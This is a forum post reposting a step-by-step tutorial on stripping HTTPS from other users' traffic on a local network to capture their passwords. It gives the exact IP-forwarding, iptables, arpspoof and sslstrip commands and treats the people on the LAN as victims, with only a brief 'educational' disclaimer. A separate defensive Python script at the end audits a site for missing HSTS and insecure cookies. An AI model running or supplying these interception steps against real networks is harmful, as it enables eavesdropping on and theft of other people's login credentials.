Parsi Coders
Analyzing and Tracking Passwords over the SSL/HTTPS Security Protocol




Analyzing and Tracking Passwords over the SSL/HTTPS Security Protocol - Amin_Mansouri - 02-08-2013

Analyzing and Tracking Passwords over the SSL/HTTPS Security Protocol
When you hear the names HTTPS and SSL, security is probably the first thing that comes to mind. In this article you will learn how to intercept and monitor traffic and also how to capture passwords.
Note that you need the following tools:
Backtrack 5 KDE, 32-bit version
Arpspoof
Sslstrip-0.9
The rest of the material is in English, which is clear and easy to follow.
SSL Analysis : Sniffing passwords from HTTPS/SSL secured sites
A couple of days ago, I posted a tutorial on how to sniff passwords from your LAN, which showed us how to sniff HTTP, FTP, POP and TELNET usernames and passwords.
1) First, let's enable IP forwarding by typing: echo '1' > /proc/sys/net/ipv4/ip_forward
 
2) Secondly, locate the gateway IP on our LAN. To do this, type: netstat -nr
 
3) Now we have to set up iptables to redirect to port 8080. To do this, type: iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080
 
4) Start arpspoofing by typing: arpspoof -i wlan0 192.168.0.1 (replace wlan0 with your network interface and replace the IP address with your gateway server IP, which we obtained earlier by typing netstat -nr).
 
5) Lastly, let's activate sslstrip by typing: sslstrip -l 8080
 
6) Setup is complete! We now have two terminals running. One is doing the arpspoofing while the other terminal is running sslstrip.
 
7) If you want to monitor your logs as they arrive, open a third terminal and type: tail -f sslstrip.log
 
8) When users on your LAN start to log onto https sites, or any site for that matter, your screen will be filled with a lot of gibberish, trash-looking errors and stuff. This is normal, don't worry about it. Just have a joint and wait it out :) and with some patience... Voila!
 
Objective :
What we just did is instruct the gateway server to watch HTTP traffic, look for links and redirects to HTTPS traffic, and rewrite them into HTTP.
So when our victim proceeds to http://www.hotmail.com, instead of being presented with the secured https:// page, he or she will receive http://www.hotmail.com, stripping away the SSL security.
 
Author's Note:
1) For those trying it the first time, I must warn you that you will most likely see error messages appear on your terminal. But don't worry too much about it. It will still work. From all the research I've done over this issue, I've come to understand that it is a common issue that many are facing. Keep updated with the official site to see the bugs & fixes for sslstrip-0.9.
2) If you are running a heavy process, there is a chance your network might go down for a bit. Once again, don't worry about it, it will be up and sorted pretty quickly. I don't think I need to tell you that when that happens, stop all your terminals and wait for the network to patch back up.
3) To minimize the gibberish nonsense in your log, you could Google for a script called parselog.py. It's decent and clears out a lot of the gibber.
4) Please take note that sslstrip does not work against certain browsers like FF & Chrome, and I believe the gmail site as well. Do some research online regarding your target site.
5) This is for educational purposes, please DO NOT harm the innocent.
Quote: Our national drug is alcohol. We tend to regard the use any other drug with special horror. – William S. Burroughs
 
Contributed By
James
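
Seen from the defending side, the rewrite described under "Objective" only succeeds when a site relies on HTTP-to-HTTPS links and redirects alone. The following is an added example, not part of the original post: a Python audit of a site's responses for the gaps that allow such a downgrade (no HSTS, cookies without Secure, cleartext links in HTTPS pages). The sample responses, the host name and the 180-day max-age threshold are constructed assumptions.

```python
import re

# Constructed sample responses (not captured traffic): what a hypothetical
# site returns on plain HTTP and on HTTPS.
SAMPLE_HTTP = {"status": 301, "headers": [("location", "https://mail.example.test/")]}
SAMPLE_HTTPS = {
    "status": 200,
    "headers": [
        ("strict-transport-security", "max-age=31536000; includeSubDomains"),
        ("set-cookie", "session=abc123; Path=/; Secure; HttpOnly"),
        ("set-cookie", "lang=en; Path=/"),
    ],
    "body": '<form action="http://mail.example.test/login" method="post">',
}

def hsts_max_age(headers):
    """Return the HSTS max-age in seconds, or 0 if absent or malformed."""
    for name, value in headers:
        if name.lower() == "strict-transport-security":
            m = re.search(r'max-age\s*=\s*"?(\d+)', value, re.I)
            return int(m.group(1)) if m else 0
    return 0

def audit(http_resp, https_resp, min_age=15552000):  # 180 days, assumed policy
    """List the weaknesses that leave a site open to HTTPS-to-HTTP downgrade."""
    findings = []
    http_headers = {k.lower(): v for k, v in http_resp["headers"]}
    loc = http_headers.get("location", "")
    if http_resp["status"] in (301, 302, 307, 308) and loc.startswith("https://"):
        # The redirect travels in cleartext and can be rewritten in transit;
        # HSTS makes a returning browser skip the cleartext request entirely.
        if hsts_max_age(https_resp["headers"]) < min_age:
            findings.append("redirect-only: HSTS missing or max-age too short")
    else:
        findings.append("plain HTTP is served without redirect to HTTPS")
    for name, value in https_resp["headers"]:
        if name.lower() == "set-cookie":
            attrs = [a.strip().lower() for a in value.split(";")[1:]]
            if "secure" not in attrs:
                findings.append("cookie without Secure: " + value.split("=")[0])
    for url in re.findall(r'(?:action|href|src)="(http://[^"]+)"', https_resp.get("body", "")):
        findings.append("cleartext link in HTTPS page: " + url)
    return findings
```

An empty list from audit() means none of the three gaps was found in the responses supplied; it says nothing about pages that were not sampled.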